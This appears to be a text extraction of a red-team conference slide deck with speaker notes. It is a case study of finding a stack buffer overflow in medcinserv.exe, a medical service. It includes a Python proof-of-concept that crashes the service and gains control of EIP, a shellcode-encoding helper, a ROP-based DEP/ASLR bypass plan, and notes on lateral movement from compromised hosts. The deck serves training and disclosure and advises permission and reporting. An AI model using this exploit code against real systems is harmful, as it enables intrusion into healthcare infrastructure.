  • 25. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • POC Skeleton if len (sys.argv) == 3: (progname, host, port) = sys.argv else: print 'Usage: {0} host port'.format (sys.argv[0]) exit (1) csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) csock.settimeout(1) print "[+] connected to server." #Try things i = 238 data = “1,” * 1000 print "[+] sending data." send( i, len(data) + 6, data) csock.close() print "[+] goodbye" def send(type, pack_len, data=None): if pack_len < 6 or pack_len > 0x3d090: print "Length must be between 6 and 0x3d090 bytes." #Set the type buf = struct.pack('>h', type) #Send length, must be less than 0x3d090, can be negative buf += struct.pack('>i', pack_len) #Send data if pack_len > 0: buf += data try: #Send data csock.send(buf) except: pass Integer Array
  • 26. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • We own EIP 
  • 27. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries. • Medcinserv.exe, doesn’t have any built in protections
  • 28. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Bypass DEP by changing the execution permissions of the stack dynamically. • Change permissions using ROP chain composed of gadgets from the medcinserv binary. • Bypass ASLR because ROP gadgets in medcinserv binary are static. • NULL bytes are allowed since it’s an integer array buffer overflow.
  • 29. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • ROP gadgets generated for VirtualAlloc • Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
  • 30. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Exploit Design Structure
  • 31. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Shellcode to String Array Function def add_shellcode( sc ): global data #Determine the iterator shellcode_len = len(sc) iterator = shellcode_len / 4 if shellcode_len % 4 > 0: iterator +=1 counter = 0 for i in range( int( iterator ) ): entry = sc[ (i*4) : (i*4)+4 ] #Make sure length is four bytes len_entry = len(entry) if len( entry ) < 4: entry += "x90" * ( 4 - len_entry) data += str(struct.unpack("<I", entry )[0]) + "," counter += 1 return counter
  • 32. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 DEMO
  • 33. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Test Exploit • Test in as nearly identical environment as possible • Non-critical systems, preferably when users are away • Make sure to get permission • Get more shellz 
  • 34. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Reporting • US CERT • MITRE • NIST
  • 35. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 QUESTIONS? rwincey@securifera.com

Editor's Notes

  1. I work in Charleston as a red team operator. Tend to be long term operations. Because of increased defensive mechanisms we’ve started looking at additional ways to move laterally through a compromised network.
  2. Using whatever backdoors, RATs, etc, pop open a shell and start looking around. The level of access you have on the box you are on will determine how many of these things you can get. If you are assessing an enterprise, good chance that the applications will be installed on a number of other systems.
  3. Match the PIDs of processes listening to the binaries using tasklist . If it’s a service, sc query and sc qc are also useful in tracking down the location without having to search manually for the binary.
  4. Same process applies to linux.
  5. Depending on what’s available to you, you might only be able to perform static analysis. If this is the case the only thing you really need is the application binary. Hexrays decompiler.
  6. Biggest question I get when asked about how to begin searching for bugs in software, is where to start looking. Start looking at the entry points into the application. Check all parsing and sanitization routines for data coming into the application from the outside.
  7. Most buffer overruns occur around some sort of copy functions. Analyze any occurrences of these that are being used on incoming or controlled data. Check bounds checking around these functions and custom copy routines. Check if you control the indexes of any copies into memory or the sizes of memory copies.
  8. If you have the ability to setup a test environment and perform static analysis, some of these tools will help track down necessary files. Run some of these useful tools to enumerate what files you need off of the system. Either download them from the compromised machine or locate them offline. Whenever using sysinternals utilities remember to add the /accepteula otherwise a popup will come up asking for confirmation
  9. The dumps created by procdump.exe can be loaded into Windbg. File-> Open Crash Dump. Allows you to check whether runtime libraries are the same as your test environment. Check if any other mitigations are in place such as HIPS. (EMET, HBSS)
  10. If you have the ability to start and stop the process without adverse effect but don’t have the ability to debug it, you can turn on crash dump capabilities. https://msdn.microsoft.com/en-us/library/windows/desktop/bb787181%28v=vs.85%29.aspx Linux – set size of core dump to unlimited Core dumps can be loaded into gdb in a test environment.
  11. As described in the previous slides, we identify a service running on a compromised system and track down the running binary.
  12. Since we know this application is running as a service listening on port 8080, let’s start our analysis by finding usages of the function “recv” from the winsock imported library. The code following this receive will likely be the parsing functions for whatever data was sent to the application over a socket connection. We found 2 usages of the recv function, in what appear to be a recv for a header, followed by a recv for the data. Showing the decompiled version here for easier readability.
  13. As presumed, the calling function of the recv wrapper function, switches based on the command type, and parses the particular message.
  14. Much reversing later… I come across the parsing function for msg type 239 (actually 238 because the parsing code adds 1). We have a loop that iterates over a user-supplied string, that is formatted as an integer array. Inside the loop, a call is made to “char_to_long_buggy”, which converts the next number in our string to a long, and then sets the return value to the next index in our integer array on the stack. As can be seen here, the loop iterates until the number returned from “char_to_long_buggy” is zero. The problem is there is no bounds checking on this loop to ensure that the number of user-supplied integers does not exceed the size of the integer array to hold them. At this point, I have enough to warrant setting up a test environment to confirm whether or not this is an exploitable vulnerability.
  15. Run SysInternals ListDlls.exe and Handle.exe on the PID retrieved from the other utilities. No additional third party libraries are loaded, (other than McAfee HBSS). Glean information from the log file. Let’s us know that most of the necessary files are in the AHLTA Data directory.
  16. Run SysInternals ListDlls.exe and Handle.exe on the PID retrieved from the other utilities. No additional third party libraries are loaded, (other than McAfee HBSS). Glean information from the log file. Let’s us know that most of the necessary files are in the AHLTA Data directory.
  17. Run SysInternals ListDlls.exe and Handle.exe on the PID retrieved from the other utilities. No additional third party libraries are loaded, (other than McAfee HBSS). Glean information from the log file. Let’s us know that most of the necessary files are in the AHLTA Data directory.
  18. Since this particular binary is a service let’s also grab the registry information for the service so we can setup the same way in our test lab. Registry information for services resides at "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services“ add /s to query recursively.
  19. Setup as nearly an identical environment as your target. Operating system, dependencies, service registration. This is so we don’t have to test on live systems.
  20. Using the files and information I gleaned from the compromised system, I setup my test environment. I replicated the directory structure, added the medcinserv application as a service, started the service, and attached to it using Immunity Debugger. File -> Attach. Using my disassembly as a reference, I set a breakpoint at address 0x0425E80, the function that contains the stack overflow.
  21. Using the files and information I gleaned from the compromised system, I setup my test environment. I replicated the directory structure, added the medcinserv application as a service, started the service, and attached to it using Immunity Debugger. File -> Attach. Using my disassembly as a reference, I set a breakpoint at address 0x0425E80, the function that contains the stack overflow.
  22. From the IDA disassembly around the recv function calls, we saw that the protocol is structured like follows. Using your favorite language, start coding up the boiler plate code necessary to connect to a socket and send raw bytes.
  23. Setup socket code and the correct protocol format. As mentioned on slide 14, the bug involves overflowing a statically allocated integer array.
  24. When we execute or script we should trigger an access violation in our debugging as can be seen here. Our EIP ( Effective Instruction Pointer ) has been overwritten with one of the 1’s we supplied in our script, so we have verified that our bug exists and can be reached. This is the register that points to the next address to be executed.
  25. Now that we know we control EIP, we need to see what protections are in place so we can start planning what needs to be done to construct a reliable exploit. We can use the “modules” function in Corelan’s mona.py script to identify what libraries have been loaded and what compile time protections they have. From the output here, we can see that the medcinserv binary was not compiled with any protections. This means we literally need one “JMP ESP” or PUSH ESP, RET” instruction to gain control of execution. This is assuming that the system wide DEP settings are not set to Always On, which with Windows 7 is Opt-In by default. To makes things more interesting we’ll assume the system is Always-On and we have to bypass DEP and ASLR.
  26. The ability to put NULL bytes in our buffer is imperative since we will need to use addresses from our binary for the ROP chain, used to bypass DEP.
  27. Using mona.py we have generated the necessary gadgets to call VirtualAlloc. Unfortunately, the address to VirtualAlloc was not found in our binary’s import table. To make the exploit more reliable across different versions of kernel32.dll we need to resolve the address of VirtualAlloc. We can do this using GetModuleHandle and GetProcAddress
  28. Using mona.py we have generated the necessary gadgets to call VirtualAlloc. Unfortunately, the address to VirtualAlloc was not found in our binary’s import table. To make the exploit more reliable across different versions of kernel32.dll we need to resolve the address of VirtualAlloc. We can do this using GetModuleHandle and GetProcAddress
  29. We need to add a function that will convert our shellcode to a string array of integers. It will simply loop through the byte array and convert every four bytes to its integer equivalent, convert it to a string, and add it to the comma delimited list.
  30. From here you basically just have to grind through the list of available gadgets and piece everything together based on the exploit design.
  31. Before you ever throw this exploit on a live penetration test make sure you test it thoroughly in your lab. Make sure your red team lead and any white team leads give you permission before you test on live systems. Add it to your arsenal.
  32. Depending on your customers and the install base of the software you are looking at, the reporting will likely be different. The particular case study we gave, we felt it best to notify Cybercom since the software affected a GOTS piece of software.
  33. From here you basically just have to grind through the list of available gadgets and piece everything together based on the exploit design.